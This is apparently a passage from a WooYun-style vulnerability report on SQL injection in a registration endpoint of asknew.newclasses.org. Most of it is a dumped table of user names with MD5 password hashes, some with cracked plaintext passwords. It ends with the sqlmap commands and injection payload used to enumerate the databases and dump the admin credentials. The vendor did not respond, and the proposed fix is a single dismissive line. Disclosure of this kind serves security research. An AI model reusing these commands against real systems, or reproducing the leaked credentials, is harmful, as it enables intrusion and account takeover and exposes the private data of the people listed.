| 朱嫣婷        | 245f595a446b07b8176bf88ee22b0ad1                                    |
| 孟雨琴        | 246117a792c51f59ae0b4ea6176ef0f2                                    |
| 童鑫熠        | 24621a24e54066cd0dea08eba88fb84b                                    |
| 邹俊         | 24626fa716b599a9bae569a52c473003                                    |
| 叶莺         | 2462ff86bfc29f29b957bd168ac78beb                                    |
| 郁家浩        | 2463410097708f4d92750ecb73d9ccb0                                    |
| 蔡诗帆        | 24635ac28fe89cde4916e172b2e14af3                                    |
| 陈文         | 246373a49c83642ea45eb74e4357e354                                    |
| 方手强        | 24649e5baed869c6848ab2c836f2660e                                    |
| 唐徐磊        | 246640953903090baec8c9534001a57d                                    |
| 金鸣儒        | 246646e50b6b5bf09bfe38a57c02e4dd                                    |
| 王金         | 2466b6f48938dbadeda638e4e6630d4c                                    |
| 马磊         | 24672363ba0ecfe36d432fc80133bc45                                    |
| 朱海滨        | 2467d3744600858cc9026d5ac6005305 (232323)                           |
| 姚解有        | 2467ff25529fcea32f1767e8035d03c8                                    |
| 齐人丑        | 2469d4c9115fbcfaac7056c5fc0f1327                                    |
| 陈奕雅        | 246b33306bb34e478a6e3906c1cbd21d                                    |
| 顾是别        | 246c00cf565f26b14a0260cbc6e45e25                                    |
| 陈科洁        | 24705004dba86d029a70f11309f74db6                                    |
| 徐悦         | 24713a385c1d5dd2cf19aa26c8d74e56                                    |
| 刘玉玺        | 2471d86671bab5af705ea737e67f6047                                    |
| 许的中        | 2474219a814a575aeeb9dd48dc2c5077                                    |
| 汪佳便        | 2474ec89d7ef034e21c0f2d9f707303b                                    |
| 尤好功        | 24753870a0199c176a3cecb0ce290cf9                                    |
| 蒋润灏        | 2475e1c8c4c67487e8e373c4ac2db7f8                                    |
| 姚零遇        | 2475e7e0f58af296feb8745f58ebc737                                    |
| 水忍功        | 24762e08a271922893782b7c81dd71a7                                    |
| 梁是意        | 247781834bdb317fd23d2abb7ebe8cc6                                    |
| 蓝时越        | 2478427283d2194c6e986b47b64aac0c                                    |
| 郑种的        | 247962fefa34362f0a3eba40fd1b8b24                                    |
| 袁佳欣        | 2479cb5cfe368995bf9c3e271e42ae7f                                    |
| 宋成珉        | 2479d15d9e8a8eecef5a27da97ec058d                                    |
| 计尊都        | 247b594f28b68da8fad85ae0634e8608                                    |
| 吴昊         | 247c70f3863556aefe923b49bee4928b                                    |
| 前进         | 247c749e82ce5e92defe2e367c6b3391                                    |
| 王听雨        | 247d5242b5f70df6eb94570e2607a2ab                                    |
| 谈轻际        | 247e8bdc08915c5335d1ea61b0ed8ea9                                    |
| 陈前         | 2480f1b6b6a1391f2d1a2c070fd47ba1                                    |
| 朱雨晴        | 248351b36c9ea6a5b2b26dd3180c0703                                    |
| 周泰娟        | 24863c4c5c44b86d847265a0047bd69e                                    |
| 孙大龙        | 24869cb3e8680c93745d8c7bf3831dc1                                    |
| 袁利人        | 24878eec0c9c91d8839430315ccba2dd                                    |
| 蒋抱解        | 248a08efff78ff16b96e04f57ef895c1                                    |
| 贝来跳        | 248a2abc387523493a9debc118a4a398                                    |
| 蓝表为        | 248c1e4f3bee01f632f5203899cb8595                                    |
| 杨丽         | 248f1a28e3aa50bb7788a9e353b4a540                                    |
| 杨茂峰        | 249047d07ea36b7669fae8b4ee56b37a                                    |
| 尹容上        | 24906b3ab5b8c7dab5092cdb22179fae                                    |
| 何睿宸        | 24909be94282f450808bb7e463884f36                                    |
| 金极洋        | 24920779dc004a3d61ed565319e1d86b                                    |
| 李龙宝        | 24930635a28f9d390aca44b169169a79                                    |
| 余的不        | 2496b305c43b44babb2887af0583ea81                                    |
| 杨帆         | 2497571fb9fa9f37378aacfc4623efef                                    |
| 苗学不        | 24988c8cfe14e843cf8e8ef03c973b5f                                    |
| 汪形作        | 249adf00328057cfcfac3bfdeb7372b6                                    |
| 落晨         | 249cfbd17aeef077f1cfdb0a08a2a8e1                                    |
| 宋思思        | 24a1ceec173b9e9337069a35dd7aafcf                                    |
| 王宇         | 24a301b266dd4d6c4f14216d43f2eaf5                                    |
| 许传刚        | 24a647d1d6e29b412fa51e21d6841c2b                                    |
| 周艳         | 24a6591f5ca1853800c5cc4bae5abaa7                                    |
| 贾愚低        | 24a71e6739c40b29dfb7f2fb296a3e54                                    |
| 柳智才        | 24a75a31ddb904d28749299a25774450                                    |
| 庞激前        | 24a9b9efbb98e37ca29b265c656b671d                                    |
| 吴佳嵘        | 24adeab1786b4acc66fe0ce9c71c121e                                    |
| 潘晓恒        | 24b14adce978e38da271be72dee8d56d                                    |
| 车雨晨        | 24b52ab0a3adbd82392f2a5cf338534a                                    |
| 吴佳健        | 24b569faf36c155ecd75dfdcfc2f1f68                                    |
| 安的大        | 24b5efd0b71eb9153a9011ebeff8f4ec                                    |
| 许超逸        | 24bd2828c5e0318014c062ccc6f0c610                                    |
| 林中雨        | 24be4298a54e7e705b9d9fe042212ae2                                    |
| 哦咯哦        | 24bf087f6c001f5f6d41f7f087316ec5                                    |
| 蓝心的        | 24bf7d19f26d34111bf71239a973d517                                    |
| 王大雷        | 24c0f9853fcdd58996064b3d6dadc48e                                    |
| 雷沪沪        | 24c25e538b29bcd6fe42edacaaabf6a6                                    |
| 曾柯         | 24c9653dd9d0aeb96ff1afeed43c2485                                    |
| 杨鸿宇        | 24ca199c3f4bba8ea0dd8add5abd3d20 (680815)                           |
| 平的子        | 24cb38225468bc9136dbd0f2bd9a6bd9                                    |
| 沈佳宜        | 24cbb03df7779f3ceb58f12d2efc23f5                                    |
| 毛重笑        | 24cd4e819e27b0b12b7522c6fda44851                                    |
| 宋知为        | 24ce9db29b4bde1af4e83b388aae0ea1 (060406)                           |
| 姚翰韬        | 24d169c0a4fa26dfdae23a33932abe21 (Tiger123)                         |
| 王光宇        | 24d3447bf82dd64a25ba0e31e1293155                                    |
| 张佳宁        | 24d356ef93569479a7bea775b9d043e1                                    |
| 施润燕        | 24d38e7f819e9e75b970d252f9071f69                                    |
| 陆淳逸        | 24d3d918855c3fbff1c1416a1277a892                                    |
| 林泊浣        | 24d3dca9b6adffb6136269ec2dd28713                                    |
| 戚笑宇        | 24d42ceb15a7a944b3bc2f3d9e6f37fb                                    |
| 沈激前        | 24d48c6d7b747548bb442cd4f87bcd73                                    |
| 符曉浛        | 24d505d9a19063d71bfc4f5a4549c592                                    |
| 柏别你        | 24d7a2cfc5083a5154f582c5c0bfc369                                    |
| 翁世杰        | 24d7bfd252f2c256a43886e30c343044                                    |
| 刘洛楠        | 24d823a5889fcd75b46a6803f2b27755                                    |
| 钱俊任        | 24d846d86f30d7044c280ce62095b368                                    |
| 娄么七        | 24d939abc579e9789346adefd0f0c6f2                                    |
| 尤处努        | 24d97a6d1c6a4e8162d15752f479865b                                    |
| 徐旻悦        | 24da0dd9cb1293ad664f9d1d2ad8f685                                    |
| 钱储德        | 24dae06fd8bbcb1a0a455b2eb662420a                                    |
| 王志敏        | 24dc866a57cdaeaabc913f06a4734f74                                    |
| 汪在才        | 24dd5f4e3e085f694c869452b1924a9d                                    |
| 黄明鸥        | 24dfe4e1120ca3642b1c1486e690c011                                    |
| 项人得        | 24e018e32884cbbcefb3d2433b00d0ff                                    |
| 吴哲         | 24e0745e607ef0134358142463a66a52                                    |
| 钟梦莎        | 24e14b110bc7ccef2a2ef7286a50ddb6                                    |
| 月小月        | 24e191ce367cd2bf0a59cf814d49933c                                    |
| 袁方存        | 24e1b45135ac053bb7ef7828350da420                                    |
| 纪大的        | 24e22c00ef272be95f3683a6f82eec60                                    |
| 朱聪         | 24e279a2b9cefd0ff8410f3d310d4524 (258000)                           |
| 盛佳敏        | 24e2d0fe8978fe61deb899181fe5b1d1                                    |
| 王侯清        | 24e3d4bde9299fd47b6a1ab4761174c8 (19911201)                         |
| 路大度        | 24e525a6ce3a5d33451ca69dee57cf94                                    |
| 宋海涛        | 24e57306fd2bb68c568efa5615c14aa8                                    |
| 曲燕         | 24e5feeaf07adb688cee309b94964bfe                                    |
| 丁露婷        | 24e777f15dc9ec5e1f975b0709218cf4                                    |
| 储嘉玮        | 24e8868e942a918511b0914ea5e0005f                                    |
| 赖思成        | 24e8fedf76d6c03f5aed08f64541d282                                    |
| 贝紫亦        | 24ea66fabf4a560c4e748f52872c690a                                    |
| 陶来心        | 24eae3569bbce8833ca315e7387863f1                                    |
| 峰一龙        | 24eb29f742726fb8f71d629783da1fea                                    |
| 银珠         | 24eb35fa03d187d9bb4a21abfd8b26eb                                    |
| 徐永兴        | 24ebf0c98c3a2ef3b33a739612e4ad80                                    |
| 沈晨洁        | 24eda5fbe2e1d13211ddba5aacb7b1dd                                    |
| 唐的就        | 24f057f150a4c8526735b7bd72d6e03b                                    |
| 刘宇飞        | 24f0e2a2354266b97dfa68895bbdc2e5                                    |
| 郁亦         | 24f3aed5d9470caa7a98d55510fad279                                    |
| 陈融调        | 24f3de5dfc9bab269053d53f4ab8bf4b                                    |
| 殷对时        | 24f4cf1672e523b2f8049b3a4ed55bf4                                    |
| 张丽霞        | 24f4def201a6772918291b1085dde65a                                    |
| 祁婓         | 24f58f6b24099102820709e872d47e77                                    |
| 马壮         | 24f5a9d35963569688237c14051d96aa                                    |
| 王欢         | 24f8587a424c180c9a682bab4b8f23c5 (ziyouzizai)                       |
| 韩昱洁        | 24f8728d82f00aa4ed9981bf136e8839                                    |
| 郭望一        | 24fa5167c20d5a8e42c71fdb9fab93d1                                    |
| 林墨雪        | 24fb8a2de454282c803fb94edf0d5860                                    |
| 黄易         | 24fd3113756024625a6a9f604c68aa08                                    |
| 成者转        | 24fd5f78f961fa6ac9d18e7ad820b9e6                                    |
| 方行健        | 24fe4604ceaf9ac5049e179fd3e48eba                                    |
| 赵的对        | 24fe92f6d7de008d342f47d65cbaa9c7                                    |
| 曾思齐        | 24fec30810714691a5ed3fad81b9c6ae                                    |
| 谢辰旻        | 24ff4b2e166d3698631f19f8741e9dc8                                    |
| 王新华        | 25005443303cc9b58ed54ed67a187ea4                                    |
| 薛晴菠        | 2503cf4a0e0dd75c68f2b4c214680bed                                    |
| 唐俊晖        | 25092ab8e9cc7d98c805861772f8df86                                    |
| 苏地之        | 25098d1ef8fa77efb8b4be8839371990                                    |
| 黄然逸        | 250bec69b1740e048f870cbe6544bad8                                    |
| 冯欣伟        | 250bf13953ea8b21d50a0a7d75c6b62d                                    |
| 张临风        | 250cbc81f4a6a0f68a17363a89b57775                                    |
| 殷喜会        | 250d5eab992e048f8e4c030a87aeb1b0                                    |
| 危低事        | 250dd644247571ae27d87563a60daa9c                                    |
| 王至诚        | 250e0aaa51dad033202e6c34d8602b4d                                    |
| 袁永恒        | 250ef2d7a4d1215ca172467411c17f02                                    |
| 匡李屹        | 2510ea3d89f49d5ca89ff7dd56592387                                    |
| 谈持的        | 2511a540b1fc21cc8a48e4cdee435705                                    |
| 张之敏        | 25158e56fa741ae2a3941fa54d9dea80                                    |
| 顾逸雯        | 25169f9800627036f7ece9d50cf2038c                                    |
| 罗连         | 2518378ea8add84e915ce8cf3fc7944b                                    |
| 陆婷         | 25187f603a6c3c6d4992fe6300357e7b                                    |
| 郝泾舟        | 2518cd583481cd7ccde335ba5bfe584f                                    |
| 孙楠         | 2519c1e60118864d6c3e1ee0b8385052                                    |
| 徐寅钦        | 2519fff994723e7b1d7375257e9ee1c9                                    |
| 奚卓越        | 251a4019352db702b00184c1574474d8                                    |
| 练达菲        | 251b703357da6116d5f180fe316f99e2                                    |
| 刘莉萍        | 251baf7b8eb73e00b570ada5b84e4868                                    |
| 林浩然        | 251c979cd3449cc710bc20c466113389                                    |
| 王奕杰        | 251d3ab0f96d95b656bf21888aad8bed                                    |
| 徐佳龙        | 251e17516fec948824434f1a01c0a745                                    |
| 刘龙强        | 251f5329b46d11da096d8f36d6eb4ba7                                    |
| 秋子钰        | 251fba829280b74eda59913c07def745                                    |
| 周大自        | 25206a9c7e938d82c9caecc778630bfb                                    |
| 钟书悦        | 2520e093d054a1376f709b755ec0733f                                    |
| 杨荣         | 2520e36dad8df59acaeba38164fa5a71                                    |
| 路把该        | 25212277b00000957fabfc00c4402734                                    |
| 董睿芃        | 25216822507157fca86fa1ca9d1e0954                                    |
| 张元昊        | 2521fd913ad0b7c60cfa9bbadfd761e6                                    |
| 严晨劼        | 25222cca08ebc07a8cb354ee2606c6e7                                    |
| 范房重        | 252301e706b1043be495ec71cc85074f                                    |
| 陈心妍        | 2523f5c96ab3208ed722850a7295999f                                    |
| 李建         | 2524773f165943d6cd7176b8865321ec                                    |
| 王侯         | 25253f88af72196040d1e2819d3b4d90                                    |
| 麻该中        | 25267a3d6e45f79038e71e2c16da881c                                    |
| 梁成         | 25279e912fc4e2d2ecb5767f0b72e7a9                                    |
| 莫瑜         | 252932f0c0a747fb4c7f4239f426f0a3                                    |
| 董凡能        | 2529d774a600e006a70f4984a1361454                                    |
| 朱伟         | 252a021e6202d7eb9f341dc72b9cd406                                    |
| 沈熠昆        | 252a9c51c6fcace9806ab654d40db683                                    |
| 祝燕         | 252b07045ee97f2081d560a5c7017fdb                                    |
| 俞熟事        | 252b6b5b3543bb4033fc4b6bff66b0a1                                    |
| 雷就给        | 252b90b4b4f562018b54c3c6f708f7b8                                    |
| 徐辉         | 252bc88cded85fd0f300ca8b664a857c                                    |
| 黄泽宁        | 252d5c55418f64d805a3dd01a2579070                                    |
| 卞建功        | 252f43f5ac1c13d0bf67cfde719d7604                                    |
| 花且天        | 253072eeb982ad048812110433877131                                    |
| 戴作做        | 2530afcc0e3d4b3a2fb42bd7f51d1741                                    |
| 郝例上        | 2531994f6abd5cd6daea42c882cc965d                                    |
| 管伶哥        | 2532493595e4470fb72b45d041335f85                                    |
| 周佳晨        | 2533138216aea46820ba160a2dd563d1                                    |
| 范便面        | 25338cf21938622b7e7f4d2552b4bf8f                                    |
| 湛知里        | 2533de66afee6de0e5033b44588cd991                                    |
| 邢帅         | 253595cb0af33c17bba0c7eea04818e7                                    |
| 柳忍票        | 2535ff39745c6580e59c9a3639e65a6a                                    |
| 汤珺忆        | 253614bbac999b38b5b60cae531c4969 (2012)                             |
| 刘驭风        | 2537a88fb3a9aed7f1c2a4f7023dbdcd                                    |
| 刘静         | 25393d0c19cfd98ed1fac2919cd9dd7a                                    |
| 管文杰        | 253a43f05e869a49eba3185481e6d33e                                    |
| 刘琼         | 253b4b4d8e1d7da4405fcc2d8816db98                                    |
| 邹帝是        | 253bd32e065f78223685c522aeba3dbf                                    |
| 肖骏         | 25401b551416a92f567e8d80a9a101ca                                    |
| 徐舜杰        | 254284e7106d5d78a0a5cc24144b32a7 (7412369)                          |
| 戴能简        | 25452fc3d8c752a08f41a152591fdd8a                                    |
| 章尊反        | 2545330cc9a247ce8a5544643bf6e2df                                    |
| 皮有只        | 2546b5cb03ff758256253922b22b935a                                    |
| 孙凯         | 2547978214cc906154503c2c783940b3                                    |
| 刘秀梅        | 2547a7386b65d218a140b7e6c4d5314b                                    |
| 李逸阳        | 2547d7d8184ba7daab7f928b33a35b0b                                    |
| 金雯贞        | 2548fabf3c027e5ed92b7f91f53152e3                                    |
+------------+---------------------------------------------------------------------+


漏洞证明:

贴出图片:
获取当前数据库:

sqlmap -u "http://asknew.newclasses.org/ajax/HRegister.ashx" --data "func=UserIsRegister&user=-1%27%20or%2019%20%3d%20%2717" --current-db


2.png


获取所有数据库名称:

sqlmap -u "http://asknew.newclasses.org/ajax/HRegister.ashx" --data "func=UserIsRegister&user=-1%27%20or%2019%20%3d%20%2717" --dbs


1.png


sqlmap -u "http://asknew.newclasses.org/ajax/HRegister.ashx" --data "func=UserIsRegister&user=-1%27%20or%2019%20%3d%20%2717" -D "NewClasses" --tables


4.png


z.png


x.png


c.png


sqlmap -u "http://asknew.newclasses.org/ajax/HRegister.ashx" --data "func=UserIsRegister&user=-1%27%20or%2019%20%3d%20%2717" -D "NewClasses" -T "UserInfo" --columns


q.png


w.png


直接脱裤。

sqlmap -u "http://asknew.newclasses.org/ajax/HRegister.ashx" --data "func=UserIsRegister&user=-1%27%20or%2019%20%3d%20%2717" -D "NewClasses" -T "UserInfo" -C "nowAdmin,PassWord" --dump


5.jpg


6.jpg


修复方案:

过滤,你们修。

版权声明:转载请注明来源 千斤拨四两@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论